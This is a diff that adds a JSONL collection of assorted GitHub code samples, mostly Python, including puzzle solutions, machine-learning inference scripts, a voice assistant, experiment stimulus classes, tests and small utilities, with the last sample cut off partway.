diff --git "a/3552.jsonl" "b/3552.jsonl" new file mode 100644--- /dev/null +++ "b/3552.jsonl" @@ -0,0 +1,1173 @@ +{"seq_id":"9991298266","text":"from typing import Set\n\nfrom Day import Day\n\n\nclass Day8(Day):\n LEN_GUESS = {2: {1},\n 3: {7},\n 4: {4},\n 5: {2, 3, 5},\n 6: {0, 6, 9},\n 7: {8}}\n\n MATCH_NB = {'abcefg': 0, 'cf': 1, 'acdeg': 2, 'acdfg': 3, 'bcdf': 4, 'abdfg': 5, 'abdefg': 6,\n 'acf': 7, 'abcdefg': 8, 'abcdfg': 9}\n\n def __init__(self):\n super().__init__(8)\n self.patterns = None\n self.combinations = None\n self.combinations_nb = None\n self.guesses = None\n\n def build_data(self, input_data):\n self.patterns = []\n self.combinations = []\n self.guesses = []\n for line in input_data:\n line_split = line.split(' | ')\n self.patterns.append(line_split[0].split(' '))\n self.combinations.append((line_split[1].split(' ')))\n\n def count_easy_guesses(self, input_data):\n self.build_data(input_data)\n count = 0\n for c in self.combinations:\n for digit in c:\n if 1 < len(digit) < 5 or len(digit) == 7:\n count += 1\n return count\n\n @staticmethod\n def revert_combination(guess):\n mapping = {}\n one = four = seven = None\n all_char = {'a', 'b', 'c', 'd', 'e', 'f', 'g'}\n var_069 = set()\n for key in guess:\n if len(key) == 2:\n one = set([c for c in key])\n elif len(key) == 3:\n seven = set([c for c in key])\n elif len(key) == 4:\n four = set([c for c in key])\n elif len(key) == 6:\n var_069 = var_069.union(all_char.difference(key))\n revert_a = seven.difference(one).pop()\n revert_bd = four.difference(one)\n revert_c = var_069.intersection(one).pop()\n revert_d = revert_bd.intersection(var_069).pop()\n revert_b = revert_bd.difference({revert_d}).pop()\n revert_f = one.difference({revert_c}).pop()\n revert_e = var_069.difference({revert_c, revert_d}).pop()\n revert_g = all_char.difference({revert_a, revert_b, revert_c, revert_d, revert_e, revert_f}).pop()\n mapping[revert_a] = 'a'\n mapping[revert_b] = 'b'\n mapping[revert_c] = 'c'\n mapping[revert_d] = 'd'\n mapping[revert_e] = 'e'\n mapping[revert_f] = 'f'\n mapping[revert_g] = 'g'\n return mapping\n\n def find_combination(self, input_value):\n self.build_data(input_value)\n self.guesses = []\n self.combinations_nb = []\n for idx in range(len(self.patterns)):\n guess = {i: self.LEN_GUESS[len(i)] for i in self.patterns[idx]}\n mapping = self.revert_combination(guess)\n self.combinations_nb.append([])\n for i in range(len(self.combinations[idx])):\n tmp = []\n for j in range(len(self.combinations[idx][i])):\n tmp.append(mapping[self.combinations[idx][i][j]])\n tmp.sort()\n tmp_str = \"\"\n for letter in tmp:\n tmp_str += letter\n self.combinations_nb[-1].append(self.MATCH_NB[tmp_str])\n value = 0\n start = 1000\n for elt in self.combinations_nb[-1]:\n value += elt*start\n start = start // 10\n self.combinations_nb[-1] = value\n return sum(self.combinations_nb)\n\n def solution_first_star(self, input_value):\n return self.count_easy_guesses(input_value)\n\n def solution_second_star(self, input_value):\n return self.find_combination(input_value)\n","repo_name":"F4lc0nCt/AdventOfCode2021","sub_path":"Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6365560079","text":"import numpy as np\nimport pandas as pd\nimport cv2\nfrom PIL import Image\nimport json\n\nimport pandas.util.testing as tm\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\n\nfrom collections import OrderedDict\nimport argparse\n\n\n# Function that loads a checkpoint and rebuilds the model\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath, map_location=\"cpu\")\n if checkpoint['arch'] == 'vgg16':\n model = models.vgg16(pretrained=True)\n for param in model.parameters():\n param.requires_grad = False\n else:\n print(\"Architecture not recognized.\")\n model.class_to_idx = checkpoint['class_to_idx']\n \n classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(25088, 5000)),\n ('relu', nn.ReLU()),\n ('drop', nn.Dropout(p=0.5)),\n ('fc2', nn.Linear(5000, 102)),\n ('output', nn.LogSoftmax(dim=1))]))\n\n model.classifier = classifier\n model.load_state_dict(checkpoint['model_state_dict'])\n \n return model\n\n\ndef process_image(image_path):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n \n # Process a PIL image for use in a PyTorch model\n pil_image = Image.open(image_path)\n \n # Resize\n if pil_image.size[0] > pil_image.size[1]:\n pil_image.thumbnail((5000, 256))\n else:\n pil_image.thumbnail((256, 5000))\n \n # Crop \n left_margin = (pil_image.width-224)/2\n bottom_margin = (pil_image.height-224)/2\n right_margin = left_margin + 224\n top_margin = bottom_margin + 224\n \n pil_image = pil_image.crop((left_margin, bottom_margin, right_margin, top_margin))\n \n # Normalize\n np_image = np.array(pil_image)/255\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n np_image = (np_image - mean) / std\n \n # PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array\n # Color channel needs to be first; retain the order of the other two dimensions.\n np_image = np_image.transpose((2, 0, 1))\n \n return np_image\n\n\n\n### Class Prediction ###\n\n# Implement the code to predict the class from an image file\n\ndef predict(image_path, model, topk=5, gpu=\"cpu\"):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n model.to(gpu)\n \n image = process_image(image_path)\n \n # Convert image to PyTorch tensor first\n image = torch.from_numpy(image).type(torch.FloatTensor)\n \n # Returns a new tensor with a dimension of size one inserted at the specified position.\n image = image.unsqueeze(0)\n output = model.forward(image.to(gpu))\n probabilities = torch.exp(output)\n \n # Probabilities and the indices of those probabilities corresponding to the classes\n top_probabilities, top_indices = probabilities.topk(topk)\n \n # Convert to lists\n top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0] \n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0] \n \n # Convert topk_indices to the actual class labels using class_to_idx\n # Invert the dictionary so you get a mapping from index to class.\n \n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\n #print(idx_to_class)\n \n top_classes = [idx_to_class[index] for index in top_indices]\n \n return top_probabilities, top_classes\n \n\n\n\ndef main():\n print(\"this is main test code\")\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type = str, default = 'images/flowers/test/15/image_06351.jpg', help=\"path for input data to predict\")\n parser.add_argument('--save_path', type=str, default = 'weights/checkpoint.pth', help=\"path for saving checkpoint\")\n parser.add_argument('--json_path', type = str, default = 'flower_to_name.json', help=\"path for json file which have classes\")\n\n parser.add_argument('--gpu', default=\"cpu\", help='disables CUDA training')\n\n\n args = parser.parse_args()\n\n\n device = torch.device(\"cpu\")\n\n with open(args.json_path, 'r') as f:\n flower_to_name = json.load(f)\n\n\n model = load_checkpoint(args.save_path)\n probs, classes = predict(args.input_path, model.to(device), 5, args.gpu) \n\n \"\"\"\n for i in range(len(classes)) : \n print(classes[i], \" : \", flower_to_name[classes[i]])\n \"\"\"\n\n print(\"flower : \", flower_to_name[classes[0]], \" / probability : \", probs[0])\n\n if probs[0] > 0.8 : \n result = open(\"prediction_result/result.txt\", \"w\")\n data = \"{} : {}\" .format(flower_to_name[classes[0]], probs[0])\n result.write(data)\n else : \n print(\"probability is too low\")\n\n \nif __name__=='__main__' : \n main()","repo_name":"auswls/pytorch-cpu","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23903184545","text":"# 백준 7569번\n# 틀림\n# 반례\n# 5 3 1\n# 0 0 0 0 0\n# 0 1 0 1 0\n# 0 0 0 0 0\n\nfrom collections import deque\n\ndef f(h, i, j):\n q = deque()\n\n q.append((h, i, j))\n visited[h][i][j] = 0\n\n while q:\n h, i, j = q.popleft()\n for k in range(4):\n ni = i + di[k]\n nj = j + dj[k]\n if 0 <= ni < N and 0 <= nj < M:\n if box[h][ni][nj] == '0' and visited[h][ni][nj] == -1:\n box[h][ni][nj] = '1'\n q.append((h, ni, nj))\n visited[h][ni][nj] = visited[h][i][j] + 1\n for l in range(2):\n nh = h + dh[l]\n if 0 <= nh < H:\n if box[nh][i][j] == '0' and visited[nh][i][j] == -1:\n box[nh][i][j] = '1'\n q.append((nh, i, j))\n visited[nh][i][j] = visited[h][i][j] + 1\n\n\ndh = [-1, 1]\ndi = [0, 1, 0, -1]\ndj = [1, 0, -1, 0]\n\nM, N, H = map(int, input().split())\n\nbox = [[list(input().split()) for i in range(N)] for h in range(H)]\n# print(box)\n\nvisited = [[[-1]*M for i in range(N)] for h in range(H)]\n# print(visited)\n\nfor h in range(H):\n for i in range(N):\n for j in range(M):\n if box[h][i][j] == '1' and visited[h][i][j] == -1:\n f(h, i, j)\n# print(box)\n# print(visited)\n\nresult = 0\nmaxV = 0\nfor h in range(H):\n for i in range(N):\n for j in range(M):\n if box[h][i][j] == '0':\n result = -1\n if visited[h][i][j] > maxV:\n maxV = visited[h][i][j]\n if result == -1:\n break\n if result == -1:\n break\n if result == -1:\n break\nif result == -1:\n print(result)\nelse:\n print(maxV)","repo_name":"GyuReeKim/PycharmProjects_2nd","sub_path":"200108/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3565041502","text":"from config import *\nimport traceback\n\ndef get_all_tracks():\n\t\tcollection = db.collection(u'Tracks')\n\t\treturn list(map(lambda x: x.to_dict(), collection.stream()))\n\nfor track in get_all_tracks():\n\tprint()\n\tfor key,value in track.items():\n\t\tprint(key, \"-->\", value)\n","repo_name":"McTechie/iste-spotify-workshop","sub_path":"Day 2/Firebase/data_retrieval.py","file_name":"data_retrieval.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8444881825","text":"from typing import TypeAlias\n\nIMAGE_TYPES = (\n \"rgb\",\n \"gif\",\n \"pbm\",\n \"pgm\",\n \"ppm\",\n \"tiff\",\n \"rast\",\n \"xbm\",\n \"jpeg\",\n \"bmp\",\n \"png\",\n \"webp\",\n \"exr\",\n \"svg\",\n)\n\nCOMMANDS = {\n (\"help\", \"-h\"): \"help\",\n (\"change\", \"-c\"): \"change\",\n (\"delete\", \"-d\"): \"delete\",\n (\"metadata\", \"-m\"): \"metadata\",\n (\"metadata-detailed\", \"-md\"): \"metadata-detailed\",\n (\"save\", \"-s\"): \"save\",\n}\n\nNOT_IMAGE: TypeAlias = None\n","repo_name":"practicesavedtheworld/metadata_deleter","sub_path":"src/constants/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40508126838","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\n\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\nengine.setProperty(\"voice\", voices[1].id) # 0 is male 1 is female\n\ndef talk(command):\n engine.say(command)\n engine.runAndWait()\n\ndef main():\n try:\n with sr.Microphone() as source_audio:\n print(\"Listening...\")\n voice = listener.listen(source_audio)\n command = listener.recognize_google(voice)\n command = command.lower()\n if \"siri\" in command:\n command = command.replace(\"siri\", \"\")\n talk(command)\n print(command)\n elif \"play\" in command:\n command = command.replace(\"play\", \"playing\")\n pywhatkit.playonyt(command)\n\n elif \"time\" in command:\n current_time = datetime.datetime.now().strftime(\"%I:%M %p\")\n print(current_time)\n talk(\"the time is {}\".format(current_time))\n\n elif \"info\" in command:\n person = command[::1]\n print(person)\n info = wikipedia.summary(person, 1)\n talk(info)\n elif \"information\" in command:\n person = command[::1]\n print(person)\n info = wikipedia.summary(person, 5)\n talk(info)\n elif \"joke\" in command:\n talk(pyjokes.get_joke())\n\n else:\n talk(\"repeat...\")\n except:\n talk(\"Did not understand... try again..\")\n\n\ndef run_alexa():\n while True:\n main()\n\n\nrun_alexa()\n ","repo_name":"erfan231/alexa_clone","sub_path":"alexa.py","file_name":"alexa.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42830915018","text":"import fnmatch\nimport os\nimport wave\nimport logging\nimport random\nfrom contextlib import closing\nfrom opyrant.utils import Event, filter_files\n\nlogger = logging.getLogger(__name__)\n\n# TODO: Integrate this concept of \"event\" with the one in events.py\n\nclass Stimulus(Event):\n \"\"\"docstring for Stimulus\"\"\"\n def __init__(self, *args, **kwargs):\n super(Stimulus, self).__init__(*args, **kwargs)\n if self.label=='':\n self.label = 'stimulus'\n\n\nclass AuditoryStimulus(Stimulus):\n \"\"\"docstring for AuditoryStimulus\"\"\"\n def __init__(self, *args, **kwargs):\n super(AuditoryStimulus, self).__init__(*args, **kwargs)\n if self.label=='':\n self.label = 'auditory_stimulus'\n\n @classmethod\n def from_wav(cls, wavfile):\n\n logger.debug(\"Attempting to create stimulus object from %s\" % wavfile)\n with closing(wave.open(wavfile,'rb')) as wf:\n (nchannels, sampwidth, framerate, nframes, comptype, compname) = wf.getparams()\n\n duration = float(nframes)/sampwidth\n duration = duration * 2.0 / framerate\n stim = cls(time=0.0,\n duration=duration,\n name=wavfile,\n label='wav',\n description='',\n file_origin=wavfile,\n annotations={'nchannels': nchannels,\n 'sampwidth': sampwidth,\n 'framerate': framerate,\n 'nframes': nframes,\n 'comptype': comptype,\n 'compname': compname,\n }\n )\n return stim\n\n\nclass StimulusCondition(object):\n \"\"\" Class to represent a single stimulus condition for an operant\n conditioning experiment. The name parameter should be meaningful, as it will\n be stored with the trial data. The booleans \"is_rewarded\" and \"is_punished\"\n can be used to state if a stimulus should consequated according to the\n experiment's reinforcement schedule.\n\n Parameters\n ----------\n name: string\n Name of the stimulus condition used in data storage\n response: string, int, or bool\n The value of the desired response. Used to determine if the subject's\n response was correct. (e.g. \"left\", True)\n is_rewarded: bool\n Whether or not a correct response should be rewarded\n is_punished: bool\n Whether or not an incorrect response should be punished\n files: list\n A list of files to use for the condition. If files is omitted, the list\n will be discovered using the file_path, file_pattern, and recursive\n parameters.\n file_path: string\n Path to directory where stimuli are stored\n recursive: bool\n Whether or not to search file_path recursively\n file_pattern: string\n A glob pattern to filter files by\n replacement: bool\n Whether individual stimuli should be sampled with replacement\n shuffle: bool\n Whether the list of files should be shuffled before sampling.\n\n Attributes\n ----------\n name: string\n Name of the stimulus condition used in data storage\n response: string, int, or bool\n The value of the desired response. Used to determine if the subject's\n response was correct. (e.g. \"left\", True)\n is_rewarded: bool\n Whether or not a correct response should be rewarded\n is_punished: bool\n Whether or not an incorrect response should be punished\n files: list\n All of the matching files found\n replacement: bool\n Whether individual stimuli should be sampled with replacement\n shuffle: bool\n Whether the list of files should be shuffled before sampling.\n\n Methods\n -------\n get()\n\n Examples\n --------\n # Get \".wav\" files for a \"go\" condition of a \"Go-NoGo\" experiment\n condition = StimulusCondition(name=\"Go\",\n response=True,\n is_rewarded=True,\n is_punished=True,\n file_path=\"/path/to/stimulus_directory\",\n recursive=True,\n file_pattern=\"*.wav\",\n replacement=False)\n\n # Get a wavefile\n wavefile = condition.get()\n \"\"\"\n\n def __init__(self, name=\"\", response=None, is_rewarded=True,\n is_punished=True, files=None, file_path=\"\", recursive=False,\n file_pattern=\"*\", shuffle=True, replacement=False):\n\n # These should do something better than printing and returning\n if files is None:\n if len(file_path) == 0:\n raise IOError(\"No stimulus file_path provided!\")\n if not os.path.exists(file_path):\n raise IOError(\"Stimulus file_path does not exist! %s\" % file_path)\n\n self.name = name\n self.response = response\n self.is_rewarded = is_rewarded\n self.is_punished = is_punished\n self.shuffle = shuffle\n self.replacement = replacement\n\n if files is None:\n self.files = filter_files(file_path,\n file_pattern=file_pattern,\n recursive=recursive)\n else:\n self.files = files\n\n self._index_list = range(len(self.files))\n if self.shuffle:\n random.shuffle(self._index_list)\n\n logger.debug(\"Created new condition: %s\" % self)\n\n def __str__(self):\n\n return \"\".join([\"Condition %s: \" % self.name,\n \"# files = %d\" % len(self.files)])\n\n def get(self):\n \"\"\" Gets a single file from this condition's list of files. If\n replacement is True, choose a file randomly with replacement. If\n replacement is False, then return files in their (possibly shuffled)\n order.\n \"\"\"\n\n if len(self._index_list) == 0:\n self._index_list = range(len(self.files))\n if self.shuffle:\n random.shuffle(self._index_list)\n\n if self.replacement is True:\n index = random.choice(self._index_list)\n else:\n index = self._index_list.pop(0)\n\n logger.debug(\"Selected file %d of %d\" % (index + 1, len(self.files)))\n return self.files[index]\n\n\nclass StimulusConditionWav(StimulusCondition):\n \"\"\" Modifies StimulusCondition to only include .wav files. For usage\n information see StimulusCondition.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n super(StimulusConditionWav, self).__init__(file_pattern=\"*.wav\",\n *args, **kwargs)\n\n def get(self):\n \"\"\" Gets an AuditoryStimulus instance from a chosen .wav file \"\"\"\n wavfile = super(StimulusConditionWav, self).get()\n\n return AuditoryStimulus.from_wav(wavfile)\n","repo_name":"opyrant/opyrant","sub_path":"opyrant/stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38576427153","text":"import cv2\nimport mediapipe as mp\nimport time\n#############\npTime = 0\ncTime = 0\n#############\n\ncap = cv2.VideoCapture(0)\n\nmpFaceDetection = mp.solutions.face_detection\nmpDraw = mp.solutions.drawing_utils\nfaceDetection = mpFaceDetection.FaceDetection(0.75)\n\nwhile True:\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = faceDetection.process(imgRGB)\n # print(results)\n if results.detections:\n for id, detection in enumerate(results.detections):\n # mpDraw.draw_detection(img, detection)\n # print(id, detection)\n # print(detection.score)\n # print(detection.location_data.relative_bounding_box) #gives us xmin, ymin, width, height\n bound_box_c = detection.location_data.relative_bounding_box \n h,w,c = img.shape\n bound_box = int(bound_box_c.xmin*w), int(bound_box_c.ymin*h), int(bound_box_c.width*w), int(bound_box_c.height*h)\n cv2.rectangle(img, bound_box, (0,255,255), 2)\n cv2.putText(img, f'{int(detection.score[0]*100)}%', (bound_box[0],bound_box[1]-20), cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),1)\n\n\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n cv2.putText(img, 'fps: ' +str(int(fps)), (10,70), cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Image', img)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","repo_name":"MallowATN/ml_projects","sub_path":"Computer Vision/FaceTracking/code/FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29254737877","text":"from util import run_emulator, read_task\n\n\ndef test_simple_example_requires_one_courier():\n result = run_emulator(read_task('example.json'))\n # 1 route is enough\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 0\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 1\n assert result['metrics']['delivery_metrics']['delivery_duration']['maximum'] < 3600\n\n\ndef test_extra_weight_requires_two_couriers():\n task = read_task('example.json')\n task['couriers'][0]['capacity'] = {'weight_kg': 100}\n task['couriers'][1]['capacity'] = {'weight_kg': 1}\n task['orders'][0]['shipment_size'] = {'weight_kg': 0.5}\n task['orders'][1]['shipment_size'] = {'weight_kg': 50}\n task['orders'][2]['shipment_size'] = {'weight_kg': 50}\n result = run_emulator(task)\n # 2 routes are needed\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 1\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 2\n\n\ndef test_time_window():\n task = read_task('example.json')\n task['orders'][-1]['time'] = {'type': 'window', 'value': {'start': 1640884528, 'end': 1640884828}}\n # It's important here, because system time (now) incrementation is first operation in emulator loop.\n task['options']['iteration_period'] = 60.0\n result = run_emulator(task)\n # 1 route is enough, but more time is needed\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 0\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 1\n assert result['metrics']['delivery_metrics']['delivery_duration']['maximum'] > 500\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_constraints.py","file_name":"test_constraints.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39795613252","text":"# función con parametros(Calculadora)\ndef calculadora(a,b):\n \n division=a/b \n multiplicacion=a*b\n resta=a-b\n suma=a+b\n print(\"La suma es: \",suma)\n print(\"La resta es: \",resta)\n print(\"La multiplicación es: \",multiplicacion)\n print(\"La divición es: \",division)\n#App para calcular 2 números\nn=int(input(\"Digite el primer número: \"))\nd=int(input(\"Digite el segundo número: \"))\ncalculadora(n,d) # llamada a la función, la calculadora se muestra en la consola","repo_name":"josemoralesQ/josemoralesQ.github.io","sub_path":"pages/icons/Funciones/proyecto3x.py","file_name":"proyecto3x.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23600637723","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport array\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('FILE', nargs=1)\n\targs = parser.parse_args()\n\n\tif not os.path.exists(args.FILE[0]):\n\t\tprint(\"enter file for argument; not '%s'\" % args.DIR[0])\n\t\tquit(1)\n\n\theader = '''\\\n\n\n\n \n\n \n\n \n\n'''\n\tprint(header)\n\n\twith open(args.FILE[0], \"r\") as file:\n\t\tfor line in file:\n\t\t\t# fekin empty lines\n\t\t\tif (line.strip() == ''):\n\t\t\t\tcontinue\n\n\t\t\tsp=[w.strip() for w in line.split('\\t')]\n\t\t\tremote = sp[0].strip()\n\t\t\tname = sp[1].strip()\n\t\t\tprint('' % (name, remote))\n\n\tfooter = '''\\\n\n\\\n'''\n\tprint(footer)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"thewisenerd/android--mirror","sub_path":"scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30244819362","text":"import json\nimport boto3\nimport base64\n\nendpoint_name ='torchserve-endpoint-2021-06-06-21-56-06'\nsession = boto3.Session(aws_access_key_id='xxxxx', aws_secret_access_key='/dgdgdf gdgvdfg dfgdf +cK')\ns3 = session.client('s3')\nsage = session.client('runtime.sagemaker')\n \nbucket_name = 'uploaderr'\n\ndef lambda_handler(event, context):\n \n # Read the input image\n body = json.loads(event['body'])\n im_b64 = body['image']\n payload = base64.b64decode(im_b64.encode('utf-8'))\n \n # Pass the image to the model & wait for the results\n response = sage.invoke_endpoint(EndpointName=endpoint_name, \n ContentType='application/x-image', \n Body=payload)\n \n # Convert list of int to list of strings\n a = [str(t) for t in json.loads(response['Body'].read()) ]\n \n return {\n 'statusCode': 200,\n 'body': \" \".join(a)\n }\n\n\n","repo_name":"the-beee/Test-Deployment","sub_path":"Serverless/lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30918642680","text":"import warnings\n\nfrom .component import Component\n\n\ndef Rock(*args, **kwargs):\n \"\"\"\n Graceful deprecation for old class name.\n \"\"\"\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"always\")\n w = \"The 'Rock' class was renamed 'Component'. \"\n w += \"Please update your code.\"\n warnings.warn(w, DeprecationWarning, stacklevel=2)\n\n return Component(*args, **kwargs)\n","repo_name":"agilescientific/striplog","sub_path":"striplog/rock.py","file_name":"rock.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"3"} +{"seq_id":"19508087700","text":"import pickle\nimport argparse\nimport string\nimport re\n\ndef get_args():\n\tparser = argparse.ArgumentParser(description = 'Convert file in assignment2 format into Text Classification feature file')\n\tparser.add_argument(\"--rp\", type=str, required=True, help=\"Raw data file in Part 2 format\")\n\tparser.add_argument(\"--fp\", type=str, required=True, help=\"Path to save feature file\")\n\targs = parser.parse_args()\n\treturn args\n\nargs = get_args()\n\n\ndatafilepath = args.rp\nsavepath = args.fp\n\n\n\n#Clean out label of sentence tool\n\ndef labelcleaner(sentence):\n\tdeletecnt = 0\n\tfor each_str in sentence:\n\t\t\n\t\tif each_str not in string.whitespace:\n\t\t\tdeletecnt += 1\n\t\telse:\t\t\t\n\t\t\tsentence = sentence[deletecnt:]\n\t\t\treturn sentence\n\n#Counting tool\ncount = lambda l1,l2: len(list(filter(lambda c: c in l2,l1)))\n\n#Split without any puncuation\ndef CleanSplitter(sentence):\n\tsentence = ''.join(c for c in sentence if c not in string.punctuation)\n\tsentence = sentence.split()\n\treturn sentence\n\ndef findLABEL(sentence):\n\tlabel = CleanSplitter(sentence)[0]\n\treturn label\n\n\n\n\n#Feature extractors\n\ndef WORDcnt(sentence):\n\tnum = len(CleanSplitter(sentence))\n\treturn num\n\ndef WHITEcnt(sentence):\n\tnum = count(sentence,string.whitespace)\n\treturn num\n\ndef PUNCcnt(sentence):\n\tnum = count(sentence,string.punctuation)\n\treturn num\n\ndef NUMcnt(sentence):\n\tnum = count(sentence,string.digits)\n\treturn num\n\ndef leadingspace(sentence):\n\tsentence = labelcleaner(sentence)\n\tnum = len(sentence) - len(sentence.lstrip())\n\treturn num\n\ndef LETTERcnt(sentence):\n\tnum = count(sentence,string.ascii_letters)\n\treturn num\n\ndef UPPERcnt(sentence):\n\tnum = count(sentence,string.ascii_uppercase)\n\treturn num\n\ndef EMAILMARKcnt(sentence):\n\tnum = count(sentence,'@')\n\treturn num\n\t\ndef INDENTcnt(sentence):\n\tnum = count(sentence,'\\t') \n\n\treturn num\n\ndef QUOTATIONcnt(sentence):\n\tnum = count(sentence,':')\n\n\treturn num\n\ndef firstPUNCsignpos(sentence):\n\tcnt = 0\n\tquotpos = 0\n\twhile cnt < len(sentence):\n\t\tif sentence[cnt] in string.punctuation:\n\t\t\tquotpos = cnt\n\t\t\treturn quotpos\n\t\tcnt += 1\n\treturn quotpos\n\n\n\n\n\n#Open up file and put everything into a list of strings\ntry:\n\tdata = open(datafilepath)\n\n\tlines = [] #Text themselfs\n\tLabelnames = [] #Unique label names\n\tTempclass = []\n\n\ttry:\n\t\tcnt = 0\n\t\tfor each_line in data:\t\n\t\t\t#Skip feature extracting for #BLANK# lines\n\t\t\t#if findLABEL(each_line) == 'BLANK':\n\t\t\t\t#continue\n\n\t\t\tlines.append(each_line)\t\n\t\t\t#Convert Label \n\n\t\t\tTempclass.append(findLABEL(lines[cnt]))\n\n\t\t\tcnt += 1\n\n\t\t#Set Unique Label classes\n\t\t#Labelnames = list(set(Tempclass))\n\texcept ValueError:\n\t\t\tpass\nexcept IOError as err:\n\tprint('File error:' + str(err))\n\texit()\n\n#################################################\n# Feature extraction rules:\t\t\t#\n#\tNum of words\t\t\t\t#\n#\tNum of whitespaces\t\t\t#\n#\tNum of punctuations\t\t\t#\n#\tNum of numbers\t\t\t\t#\n#\tNum of leadingspaces\t\t\t#\n#\tNum of letters\t\t\t\t#\n#\tNum of UPPERletters\t\t\t#\n#\tNum of EMAILMARKs\t\t\t#\n#\tNum of INDENTations\t\t\t#\n#\tNum of QUOTATIONs\t\t\t#\n#\tPosition of 1st QUOTATIONs\t\t#\n#################################################\n\ncleanlines = []\n\n\n#Make sure cleanlines only have lines without any label in front\ncnt = 0\nwhile cnt < len(lines):\n\tif CleanSplitter(lines[cnt])[0] in Labelnames:\n\t\tcleanlines.append(labelcleaner(lines[cnt]))\n\telse:\n\t\tcleanlines.append(lines[cnt])\n\tcnt += 1\n\n\n\n\n\nnumWords = []\nnumWhtspc = []\nnumPunc = []\nnumNum = []\nnumLdspc = []\nnumLetter = []\nnumUpper = []\nnumEmlMk = []\nnumIndent = []\nposPunc = []\n\nfor each_line in cleanlines:\n\tnumWords.append(WORDcnt(each_line))\n\tnumWhtspc.append(WHITEcnt(each_line))\n\tnumPunc.append(PUNCcnt(each_line))\n\tnumNum.append(NUMcnt(each_line))\n\tnumLdspc.append(leadingspace(each_line))\n\tnumLetter.append(LETTERcnt(each_line))\n\tnumUpper.append(UPPERcnt(each_line))\n\tnumEmlMk.append(EMAILMARKcnt(each_line))\n\tnumIndent.append(INDENTcnt(each_line))\n\tposPunc.append(firstPUNCsignpos(each_line))\n\n\n\n\n#Initializing Features with label, then append each converted features\nFeatures = []\ncnt = 0\n\n\n\nwhile cnt np.ndarray:\r\n img = Image.open(filename).convert(\"RGB\")\r\n arr = np.array(img)\r\n return arr\r\n\r\n\r\ndef save_image_from_numpy_array(filename: str, image_array: np.ndarray, quality: int=100):\r\n img = Image.fromarray(image_array)\r\n img.save(filename, \"JPEG\", quality=quality) # , optimize=True, progressive=True)\r\n\r\n\r\ndef show_image_from_numpy_array(image_array: np.ndarray, header: str = \"\", axis: bool = False):\r\n fig, ax = plt.subplots()\r\n ax.set_title(header)\r\n ax.imshow(image_array)\r\n\r\n if not axis:\r\n plt.axis(\"off\")\r\n\r\n plt.show()\r\n\r\n\r\ndef calculate_difference_in_images(image1: 